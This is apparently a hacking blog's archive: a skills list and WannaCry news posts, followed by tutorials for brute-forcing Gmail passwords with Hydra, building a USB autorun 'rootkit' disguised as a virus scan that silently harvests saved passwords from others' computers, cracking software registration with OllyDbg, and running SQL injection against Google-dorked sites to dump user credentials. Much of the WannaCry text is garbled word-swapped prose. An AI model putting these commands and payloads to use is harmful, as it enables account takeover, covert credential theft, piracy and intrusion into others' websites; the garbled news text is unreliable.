Tuesday, 8 August 2017


How To Become A Professional Hacker: 5 Skills You Need

Here we will talk about 5 hacking skills that will help you to become professional hackers. Check out the list of skills below


1) Basic computer and Networking skills

You need some basic computer skills to become hackers. Basic skills mean beyond the ability to create Microsoft word or powerpoint document. You must learn how to use a command line in windows, edit the registry and set up the network parameters. You must also try to understand networking like iPv4, iPv6, DHCP, NAT, Subnetting, DNS, Routers and switches, VLANs, OSI model, Public v Private IP, MAC addressing, ARP.



 

2) Linux Skill

Linux is extremely important if you want to become a pro hacker. If you have zero knowledge in Linux, then the best option is to start using Linux. Users can search for Linux series in Google that will help you to gain some knowledge regarding how to use Linux. The majority of hacking tools are developed for Linux.


Related: How To Protect Your WiFi Router From Hackers


3) Virtualization and Security Concepts

Do you know about Virtualbox, Vmware, and Workstation? There are virtual platforms where users test their hacks before they take them to the real world. The virtual environment is a safe environment where you can test and implement your hacking techniques. So, you must learn to properly use these virtualization benefits. You must also try to learn about security concepts because the only way to overcome the roadblocks created by security admins is to be familiar with them.



 

4) Wireless Technologies/Scripting

Wireless technologies become very handy to send information and data via invisible waves in the air. So, you must first learn and understand the functioning of wireless technologies. You must learn various encryption algorithms like WPA, WPA2, WEP, and WPS. Scription is another skill that is must-needed. Scripting will help you develop your own unique tools.


5) Database And Web Applications

If you want to become a good hacker then you must learn SQL language because this will help you understand databases and how they work. You can also learn major DBMS’s like SQL Server, Oracle or MySQL. If we talk about Web Applications then these are the software which we use on the internet via our web browser. Learning the concept of web applications will help you to make your own web apps to do whatever you want.


Related: Top 5 Best Websites To Learn Ethical Hacking For Beginners


These are the five best skills that one needs to master the art of hacking. Hope you like the article, share it with others also.

hackers

Monday, 22 May 2017

Upcoming Cyber ​​attacks coming
Nowadays, radical changes have been observed in terms of technology, because the internet facilitates access to information and instant communication, and this means that people and institutions are in need of automating their environment by making it more productive.
The potential offered by having information is also a risk, since there are individuals or organizations (cybercriminals) that commit violent acts, that is to say, unlike to carry out a robbery with balaclavas and a white weapon, now they execute the same act attacking systems of Information such as: computer networks or databases found on remote servers.
In these times, keys of an electronic device are used to hijack or compromise the confidentiality or something inestimable as the data, then blackmail with damage or request a rescue.
Cyber ​​attacks can be directed to computer systems operating on the network worldwide, and have the ability to cancel the service they provide for permanent or temporary time making daily work difficult. The number of people affected may increase as countries join the digital revolution.
Cyber ​​attacks made headlines
Cyber ​​attacks are performed in order to subtract, edit or destroy information in a malicious way, thus obtaining money in cash or bitcoins (money in digital). At the moment this type of attacks has become a great threat for any person and company with digital information of value.
The main focus of action on cyber attacks in the current year, affect government agencies, telecommunications companies and universities. They are also aimed at theft of credentials, credit cards, and "internet of things" devices, so companies are seeing a need to take measures to manage computer risks.
Why take action? The goal is to predict and safeguard critical assets, systems and data with cybersecurity programs that contain tools, protocols, and trained personnel to combat growing cyber attacks.
WannaCry Case
In the last days several countries have been attacked by a computer virus called "WannaCry", it is a wave of mass propagation of ransonware that is in charge of encrypting important documents of a computing device and a So that they can not be executed; The screen warns the user that he has been the victim of a digital attack and that to enter his data must spend an amount of money.
Several experts in the matter say that the virus is based on a security failure by Windows, especially obsolete versions and therefore spreads vertiginously. Also, they have not taken the necessary precautions like updating the operating system, using the patch or a good antivirus.
Results of cyberattack
One of those affected by this virus was the telecommunications sector in Spain, the Telefónica company, when 85% of the equipment became infected, rapidly scaled nationally and internationally, adding health organizations and all types of networks.
What happened is of great gravity due to material losses, so it should be taken as a teaching and make everyone aware of the value of security and how vulnerable we are to cyber attacks.
Although reacting in time to minimize the consequences, not all companies invest or give importance to this imminence, taking measures of protection and detection to reduce the impact of attacks.
To conclude cyber attacks are unpredictable, the only way to detect and prevent information theft is to have a customized and adaptable security platform that can combat attacks against threats that are invisible to standard security defenses.

PróximosCiberataques que están por llegar
En la actualidad se han observado cambios radicales en lo que a tecnología se refiere, debido a que el internet facilita el acceso a la información y a la comunicación instantánea y esto conlleva a que personas e instituciones se vean en la necesidad de automatizar su entorno haciéndolo más productivo.
El potencial que ofrece el tener información también es un riesgo, ya que existen individuos u organizaciones (ciberdelincuentes) que cometen actos violentos, es decir, a diferencia de realizar un robo con pasamontañas y un arma blanca, ahora ejecutan el mismo acto arremetiendo sistemas de información como: redes computacionales o bases de datos que se encuentran en servidores remotos.
En estos tiempos, se utilizan teclas de un dispositivo electrónico para secuestrar o comprometer la confidencialidad o algo inestimable como los datos, para luego chantajear con dañarlo o solicitar un rescate.
Los ciberataques pueden dirigirse a sistemas de computación que operan en la red a nivel mundial, y tienen la capacidad de anular el servicio que prestan por tiempo permanente o temporal haciendo que sea difícil el trabajo cotidiano. La cifra de afectados puede aumentar a medida que los países se incorporan a la revolución digital.
Ciberataques fueron noticia
Los ciberataques se realizan con el fin de sustraer, editar o destruir información de manera malintencionada, obteniendo así dinero ya sea en efectivo o bitcoins (dinero en digital). Actualmente este tipo de ataques se ha convertido en una gran amenaza para cualquier persona y empresa con información digital de valor.
Los principales focos de actuación en cuanto a ataques cibernéticos en el año en curso, afectan a: entes gubernamentales, empresas de telecomunicaciones y universidades. Asimismo, orientados al robo de credenciales, tarjetas de crédito, y aparatos del “internet de las cosas”, por lo que las empresas se están viendo en la necesidad de tomar medidas para gestionar los riesgos informáticos.
¿Por qué tomar acciones? el objetivo es predecir y resguardar sus activos, sistemas y datos críticos con programas de ciberseguridad que contienen herramientas, protocolos y personal capacitado para combatir los crecientes ciberataques.
Caso WannaCry
¿Ciberataques que está por llegar?, durante los últimos días varios países han sido atacados por un virus informático llamado “WannaCry”, se trata de una ola de propagación masiva de ransonware que se encarga de encriptar documentos importantes de un dispositivo de cómputo y una red para que no puedan ser ejecutados; en la pantalla se le avisa al usuario que ha sido víctima de un ataque digital y que para entrar a sus datos debe gastar una cantidad de dinero.
Varios expertos en la materia afirman que el virus se basa en una falla de seguridad por parte de Windows, sobretodo versiones obsoletas y por eso se esparce de manera vertiginosa. Además, no han tomado las precauciones necesarias como actualizar el sistema operativo, usar el parche o un buen antivirus.
Resultados de ciberataque
Uno de los afectados por este virus fue el sector de telecomunicaciones en España, a la empresa Telefónica, cuando el 85% de los equipos se infectaron, escaló rápidamente a nivel nacional e internacional, sumando a organizaciones de la salud y todo tipo de redes.
Lo ocurrido es de gran gravedad debido a pérdidas materiales, por lo cual debe ser tomado como una enseñanza y concientizar a toda persona el valor de la seguridad y lo vulnerable que somos a los ciberataques.
Aunque reaccionar a tiempo logra minimizar las consecuencias, no todas las compañías invierten ni le dan la importancia a esta inminencia, tomando las medidas de protección y detección para disminuir el impacto de los ataques.
Para concluir los ciberataques son impredecibles, la única manera de poder detectar y prevenir un robo de información es tener una plataforma de seguridad personalizada y adaptable, que logre combatir los ataques frente a amenazas que resulten invisibles para las defensas de seguridad estándar.









Monday, 15 May 2017

Wanna Cry Ransomware Attack | All You Need To Know About It


Wanna Cry Ransomware attack



Wanna Cry Ransomware attack also called  WannaCrypt, WanaCrypt0r 2.0, Wanna Decryptor is a ransomware effecting the Microsoft Windows operating system. This Friday, May 12 2017, a huge cyber-attack was spread using Wanna Cry Ransomware Attack, infecting over 230,000 computers in 150 countries over the globe, demanding ransom payments in the cryptocurrency Bitcoin in 28 languages. The attack has been described by Europe as unprecedented in scale.

What exactly does Wanna Cry Ransomware Attack do?

RansomWare like Wanna Cry Ransomware Attack works by encoding most or even the majority of the records on a client's PC. At that point, the product requests that a payment be paid keeping in mind the end goal to have the records decoded. On account of Wanna Cry Ransomware Attack particularly, the product requests that the casualty pays a payment of $300 in bitcoins at the season of contamination. On the off chance that the client doesn't pay the payment without three days, the sum copies to $600. Following seven days without installment, Wanna Cry Ransomware Attack will erase the greater part of the encoded records and all information will be lost.

Here is a full list of the filetypes that are targeted and encrypted by Wanna Cry Ransomware Attack:

  • .123
  • .3dm
  • .3ds
  • .3g2
  • .3gp
  • .602
  • .7z
  • .ARC
  • .PAQ
  • .accdb
  • .aes
  • .ai
  • .asc
  • .asf
  • .asm
  • .asp
  • .avi
  • .backup
  • .bak
  • .bat
  • .bmp
  • .brd
  • .bz2
  • .cgm
  • .class
  • .cmd
  • .cpp
  • .crt
  • .cs
  • .csr
  • .csv
  • .db
  • .dbf
  • .dch
  • .der
  • .dif
  • .dip
  • .djvu
  • .doc
  • .docb
  • .docm
  • .docx
  • .dot
  • .dotm
  • .dotx
  • .dwg
  • .edb
  • .eml
  • .fla
  • .flv
  • .frm
  • .gif
  • .gpg
  • .gz
  • .hwp
  • .ibd
  • .iso
  • .jar
  • .java
  • .jpeg
  • .jpg
  • .js
  • .jsp
  • .key
  • .lay
  • .lay6
  • .ldf
  • .m3u
  • .m4u
  • .max
  • .mdb
  • .mdf
  • .mid
  • .mkv
  • .mml
  • .mov
  • .mp3
  • .mp4
  • .mpeg
  • .mpg
  • .msg
  • .myd
  • .myi
  • .nef
  • .odb
  • .odg
  • .odp
  • .ods
  • .odt
  • .onetoc2
  • .ost
  • .otg
  • .otp
  • .ots
  • .ott
  • .p12
  • .pas
  • .pdf
  • .pem
  • .pfx
  • .php
  • .pl
  • .png
  • .pot
  • .potm
  • .potx
  • .ppam
  • .pps
  • .ppsm
  • .ppsx
  • .ppt
  • .pptm
  • .pptx
  • .ps1
  • .psd
  • .pst
  • .rar
  • .raw
  • .rb
  • .rtf
  • .sch
  • .sh
  • .sldm
  • .sldx
  • .slk
  • .sln
  • .snt
  • .sql
  • .sqlite3
  • .sqlitedb
  • .stc
  • .std
  • .sti
  • .stw
  • .suo
  • .svg
  • .swf
  • .sxc
  • .sxd
  • .sxi
  • .sxm
  • .sxw
  • .tar
  • .tbk
  • .tgz
  • .tif
  • .tiff
  • .txt
  • .uop
  • .uot
  • .vb
  • .vbs
  • .vcd
  • .vdi
  • .vmdk
  • .vmx
  • .vob
  • .vsd
  • .vsdx
  • .wav
  • .wb2
  • .wk1
  • .wks
  • .wma
  • .wmv
  • .xlc
  • .xlm
  • .xls
  • .xlsb
  • .xlsm
  • .xlsx
  • .xlt
  • .xltm
  • .xltx
  • .xlw
  • .zip
It also installs a text file on the user’s desktop with the following Wanna Cry Ransomware Attack note:
Wanna Cry Ransomware Attack


How can I protect myself from Wanna Cry Ransomware Attack?

Notwithstanding which working framework you run, you ought to introduce all accessible security updates instantly. In particular, Windows clients with machines that run Windows XP, Windows 8, or Windows Server 2003 ought to promptly introduce this security update discharged on Friday by Microsoft.

wanna Cry Ransomware Attack
Add caption


Wanna Cry Ransomware Attack | MICROSOFT PATCH

Microsoft on Saturday made the unordinary stride of discharging free programming patches for more established, unsupported Windows frameworks like the XP. 

The US tech organization had effectively built up a fix for the EternalBlue misuse and had discharged it as a feature of a discretionary security overhaul for Windows clients fourteen days before EternalBLue's presence was made open. 

Be that as it may, it is likely a few PCs, probably included ones influenced in the Wanna Cry ransomware attack, neglected to move up to the new fix level. Additionally, the fix was not offered for Windows XP, a variant of the operation framework that is at no time in the future upheld by Microsoft. 

In any case, that changed on Saturday with Microsoft discharging security fixes accessible for nothing for the more established Windows frameworks also. Eminently, a Kaspersky report from last October had cautioned that most ATMs in India were at hazard since they utilized Windows XP.



Wanna Cry ransomware attack

The emerging Wanna Cry ransomware attack, has used an exploit first invented by the US NSA, appeared to be slowing on Saturday. Edward Snowden was who criticized the NSA, saying the US spy agency has been building dangerous attack tools despite this IT warnings.

The Wanna Cry ransomware attack - one of the largest ever digital attacks - appeared to moderate around 24 hours after it destroyed havoc and closed down a huge number of PC frameworks across 104 nations. 

The back off happened before long 'MalwareTech', a Britain-based security researcher, accidentally found an 'off button' to halt the Wanna Cry Ransomware attack. Specialists, be that as it may, warned that venturesome hackers could go around MalwareTech's settle.

More than 200,000 frameworks around the world were affected in the Wanna Cry ransomware attack, a tracker created by a security researcher called "MalwareTech" appeared. Czech Republic-based anti-infection supplier Avast, be that as it may, gave a more conservative estimate of around 126,000 frameworks being affected, news agency Reuters revealed.

Wanna Cry ransomware attack


Wanna Cry Ransomware Attack Targeting India:

India was among the nations most exceedingly awful influenced by the Wanna Cry Ransomware Attack, information shared by Kaspersky, a Russian hostile to infection organization, appeared. As per beginning counts performed not long after the malware struck on Friday night, around five for every penny of all PCs influenced in the attack were in India. 

Mikko Hypponen, boss research officer at a Helsinki-based digital security organization called F-Secure, told news office AFP that the it was the greatest Wanna Cry Ransomware Attack flare-up in history and evaluated that 130,000 frameworks in more than 100 nations had been influenced. 

Hypponen included that Russia and India were hit especially hard, generally in light of the fact that Microsoft's Windows XP - one of the working frameworks most at hazard - was still broadly utilized as a part of the nations. 

News organization IANS revealed that police PCs crosswise over 18 units in Andhra Pradesh's Chittoor, Krishna, Guntur, Visakhatpatnam and Srikakulam regions were influenced. Be that as it may, aside from that, there was no prompt data on the degree of the Wanna Cry Ransomware Attack hang on Indian frameworks. READ: india today report here

What Actually Happened with Wanna Cry Attack:

  • On Friday, media reports began highlighting that a Wanna Cry Ransomware attack had cut down PC frameworks in UK healing centers. It soon rose that the attack was worldwide with reports of influenced PCs rolling in from everywhere throughout the globe. 

  • The ransomware - Wanna Cry - tainted PCs and encoded every one of the information put away on the hard drives. In lieu of decoding the information, Wanna Cry requested installment running between $300 (around Rs 19,000) to $600 (around Rs 39,000) in bitcoin. 

  • As of Saturday, no programmer or programmer amass had approached to claim duty regarding the digital attack, which utilized an adventure initially created by the US NSA. The European Cyber crime Center stated, "The current attack is at a remarkable level and will require a mind boggling worldwide examination to distinguish the offenders. 

  • A few specialists said the risk had retreated as of Sunday, partially on the grounds that Malware Tech enrolled an area that he saw the malware was attempting to interface with, constraining Wanna Cry's spread. Microsoft likewise issued crisis security patches for a scope of Windows adaptations. 

  • The Indian Computer Emergency Response Team (ICERT or CERT-In) was said to screen the circumstance constantly. Prior on Saturday CERT-In was accounted for to have issued an advisory asking PC clients in India to overhaul their frameworks to the most recent Windows fix level. 

  • In Brazil, the government managed savings framework needed to detach its PCs and wipe out free. The state-possessed oil organization Petrobras and Brazil's Foreign Ministry likewise detached PCs as a careful step, and court frameworks went down, as well. 

  • In Russia, government organizations demanded that the sum total of what attacks had been settled. Russian Interior Ministry, which runs the national police, said the issue had been "limited" with no data traded off. Russia's well being service said its attacks were "successfully repulsed." 

  • Germany's national railroad said Saturday takeoff and entry show screens at its prepare stations were influenced, however there was no effect on real prepare administrations. Deutsche Bahn said it conveyed additional staff to help clients. 

  • French carmaker Renault's get together plant in Slovenia ended creation after it was focused on. Radio Slovenia said Saturday the Revoz industrial facility in the southeastern town of Novo Mesto quit working Friday night to prevent the malware from spreading. 

  • Somewhere else in Europe, the attack hit Spain's Telefonica, a worldwide broadband and broadcast communications organization, and thumped ticketing disconnected for Norway's IF Odd, a 132-year-old soccer club. 

  • "I accept many organizations have not yet seen," said William Saito, a digital security guide to Japan's legislature. "Things could likely rise on Monday" as staff come back to work. 

  • China's data security guard dog said "a bit" of Windows frameworks clients in the nation were contaminated, as per a notice posted on the authority Weibo page of the Beijing branch of the Public Security Bureau on Saturday. Xinhua state news organization said some auxiliary schools and colleges were hit.


Monday, 13 October 2014

Hacking Gmail account password with kali linux | 2017

Gmail is one of the most popular email account in the world. In this article I will show you how to hack Gmail account password with kali linux 2017. Gmail hacker ??? oh oh oh...!

hack gmail account password

have you ever wondered that you can hack gmail account password for free 2017, it is as simple that you can do it on your luck.

To understand any password hacking techniques you need to know about Password Hacking Techniques and you need a Word-list for this purpose here.

My email: hackersohail@gmail.com
Password: hackedaccount

In this article I am using Hydra tool to Brute force Gmail account. Password Brute-forcing is completely depend upon your length of password-list & your luck.

 Here we are going to perform how to hack gmail account password with kali linux:
 
Steps:
Login to kali linux or backtrack.

Now open Terminal and enter the command: "hydra" and enter the following comman.

(The Gmail Password cracking Syntax will be like)

syntax:
hydra -S -l <email> -P <filepath/yourlist.txt> -e ns -V -s 465 smtp.gmail.com smtp

Like I want to hack my own  Gmail account so my command will be like:

root@RumyKali:~# hydra -S -l hackersohail@gmail.com -P /root/Desktop/pw list 1.txt -e ns -V -s 465 smtp.gmail.com smtp


It will try all possible combination of passwords that present in your Word-list. When it  finds valid password it will stop the scanning and notify you “One valid Password found“.

Enjoy hacking Gmail account password...

Friday, 18 April 2014

Hack PC password using pendrive:

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer.




steps:

1) Download all the tools mentioned below

MessenPass : http://goo.gl/WeG7lM

Mail PassView : http://goo.gl/80Nw3Q

IE Passview : http://goo.gl/e6q5Ys

Protected Storage PassView : http://goo.gl/GGbhgx

PasswordFox : http://goo.gl/hcs8F7


Note: If any link doesn't work then you can google it and download it


2) Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.


3) Create a new Notepad and write the following text into it:

[autorun] open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.


4) Create another Notepad and write the following text onto it:

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.


5) Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on on any computer to sniff the stored passwords. Just follow these steps:

Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).

In the pop-up window, select the first option (Perform a Virus Scan).

Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

Remove the pen-drive and you’ll see the stored passwords in the .TXT files.


NOTE: This can only obtain saved email id's and password and not the one which is not saved




Wednesday, 9 April 2014

Bypass Software Registration 2017 | Simple steps:

Bypass Software Registration
If you've ever wonder how software pirates can take software and crack it time and time again, even with security in place, this small series is for you on how to bypass software registration 2017. Even with today's most advanced methods of defeating piracy in place, it is still relatively easy to crack almost any program in the world. This is mainly due to computer processes' ability to be completely manipulated by an assembly debugger. Using this, you can completely crack software license process by making it skip the application's key code verification process without using a valid key. This works because assembly allows you to speak directly to the processor and force a skip over the registration process and helps you in crack any software license key to use it for life time.




let's go over how cracking could work in practice by looking at an example program (a program that serves no purpose other than for me to hack).

 I will not be walking you through crack any software using ollydbg to crack a legitimate program, because I can't just crack a program for demonstration, but the techniques applied to my examples should give you the foundation needed to create your own. At that point, it's a test of your morals if you want to use your knowledge for good or bad.






 

 Bypass software registration requirements:

  • Windows (for examples only, debuggers exist across platforms)
A debugger installed: IDA, ollydbg, etc. (ollydbg will be used in examples)
 
Let me take you to simple steps which helps you to bypass software registration.





First, run the program that you are attempting to reverse engineer and try to activate it with a random key to verify that you need a valid software key to proceed. This is to verify that we can come up with the keys.



how to crack any software using ollydbg:

  1. Run ollydbg.
  2. Open up the program you wish to bypass with ollydbg.
  3. Click the play button to run the program with the debugger attached.
  4. Right click the CPU window, and click Search For > All intermodular calls.
  5. Search for high interest DLLs. GETDLGITEMTEXT, will be for dialog boxes, which get called when you try to enter a software key. By stepping into the function with the debugger, we can examine the registration specifically. SENDDLGITEM could be used as well.
  6. Test to see which one works to break out of the activation loop by right clicking the DLL call and setting a breakpoint for all instances of that call.Bypass Software Registration hacker sohail
  7. Resume the program and enter any software key you feel like. If the debugger breaks (pauses the program's execution) after entering your key, then you know you found DLL in step 5.
  8. Press F8 back in the CPU window to force the next step until you get to the TEST EAX. EAX is the return of a value, which means that a check is being performed here. Upon examination, we can see that the EAX is checking for a number that is not equal to a null value. This means that if it is replaced with anything other than null, it will run.Bypass Software Registration hacker sohail
  9. Right-click the EAX and change it in hex value to 1, instead of 0.
  10. Resume the program again, and you will have successfully activated the program.Bypass Software Registration hacker sohail
  11. And for proof it was registered to me:Bypass Software Registration hacker sohail

Monday, 7 April 2014

Test SQL Injection Attack | Website Hacking 100% working


Warning: 

This tutorial Test SQL Injection Attack | Website Hacking 100% working is for educational purposes to make you aware of  test sql injection vulnerabilities that may be present in your website so that you may self test it in your owned website to improve the security. The person posting this or the this blog is not responsible for any type malicious activities performed by anyone else,,,,!!!




What is SQL Injection Attack? 


So let me give you some idea of what I am going to talk about and how we can perform Website Hacking using SQL Injection Attack.


There are many complex definitions you may get in various other sites,,, 


But I put it in simple terms,,,, You type some SQL queries or codes


[or whatever you wish to call it ]


on the address bar[where you type the web address of sites to be searched] 


to test vulnerable website,,,,!!!


If you find it vulnerable then BINGO,,,!!!


we will use some more SQL injection queries to Website Hacking using Test SQL Injection Attack ,,,!!!


So guyzzz who are related to computer science stream,,, If you found learning SQL boring this is one way to make yourself interested in.


And as far as others are concerned,,, please don"t worry I will be giving you some codes which you may use to Test the Vulnerability of the site,,,!!!


you must also learn how to prevent sql injection attack


So....... lets begin....!!!


Test SQL Injection Attack:


QUICK STEPS:


follow the below given steps carefully where I will be demonstrating website hacking using SQL injection attack. 


Step 1:


Search for any of the following terms in Google: 

inurl:product.php?id= 

inurl:index.php?id= 

inurl:news.php?id= 

inurl:shop.php?id= 

inurl:shop.php?pid= 

inurl:newsroom.php?id=


Step 2:

Now for example say there is a website that you found in Google search say for example 


www.rahulswebsite.com/index.php?id=7 


Open the website in a new tab,,,!!!


Step 3: 

To test if your selected website is vulnerable:


Add the ' (single quote symbol) after the site as follows www.hackersohail.com/index.php?id=7'


and now Hit the "Enter" Key,,,!!!


If there is any type of "MySQL error" !!!BINGO,,,!!!


Then it means your target website is vulnerable.


Website Hacking using SQL Injection Attack:


Step 1:

After finding the vulnerability of your target site, use the ORDER BY command to extract the number of columns in the database.


Ex Code:

http://www.anywebsite.com/index.php?id=7 ORDER BY 1-- 


Doing ORDER BY 1-- should always return the original page with NO error. 


Step 2: 

Then do ORDER BY 2-- 


If this shows the original page with NO error, continue.


 step3:

Now try ORDER BY 3--


and so on, 


If this shows the original page with NO error, continue. 


Step 4: 

Continue increasing the ORDER BY number until you reach an error. 


For example, if doing ORDER BY 10-- returns an error, then there is a table which has NINE (9) columns, NOT 10. 


Always subtract ONE from the number that produced the error.


STEP 5:

Next step is to use UNION & SELECT 


After getting the number of columns, let's say we have NINE columns. Then you have to type the following code: 


Code: 

http://www.anywebsite.com/index.php?id=7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- 


You should see a page with a few numbers scattered throughout it. If so, continue, 


IF NOT, try the following in which we have to add the " - "hypen or negative sign in front of the id value of our website:


Code: 

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--


At the end if this produces the scattered numbers, continue, if not, STOP!!!


Choose another target website from the GOOGLE search and repeat the vulnerability test,,,!!!


Step 6: 

Now we use the database() command 


After you see the scattered numbers, pick one to exploit. Say the numbers on my page are TWO and SEVEN. 


I will choose the number TWO. After choosing your number, put database() in place of it in your URL as shown below. REMEMBER, I chose number TWO.


Code:

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,database(),3,4,5,6,7,8,9-- 


That should return some text in place of the scattered TWO. WRITE THIS TEXT DOWN, and move on.


Step 7: 

We use group_concat


This is where everything gets a little trickier! This is also the part where you will be extracting data. Yeah! Bingoo!!! :D :D *** Fist punch *** 


After extracting the name of the database using database(), type this where you typed database() in the previous step. 


Code: http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--



TYPE THIS EXACTLY AS IT IS SHOWN, and press enter. 


In place of the scattered TWO, you should see a LOT of text separated by commas. These are called tables. The text varies by website, but you usually want to look for things like "admin," "staff," or "users." Choose the one that interests you. For this tutorial, I will choose "users." Now type this: 



Code: 

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()-- 


OR 


if you want the columns from ONLY one table, use this (courtesy of dR..EviL): 


Code: 

http://www.anywebsite.com/index.php?id=-7UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=< table name goes here in hex or ascii format >-- 


This should return even more text. These are called columns. Again choose what interests you, but for this tutorial, I will choose "username" and "password." 


The columns "username" and "password" contain the data we want to extract. To extract the final data, meaning, in this case, the usernames and passwords of all the users, type this: 


Code: 

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from users-- 


Where it says "username,0x3a,password,0x3a" is where you would the name of your chosen COLUMNS, such as username and password, DO NOT replace the 0x3a, ONLY the username and password area. Where it says "from users--," replace "users" with the name of your chosen table such as the one "users." All of this will produce even MORE text in this format: 


Code: 

admin:thisismypass:, 

The comma separates each set of data. 


 Test SQL Injection | website hacking must watch 







also visit:  SQL Injection Attack


Contact us

Name

Email *

Message *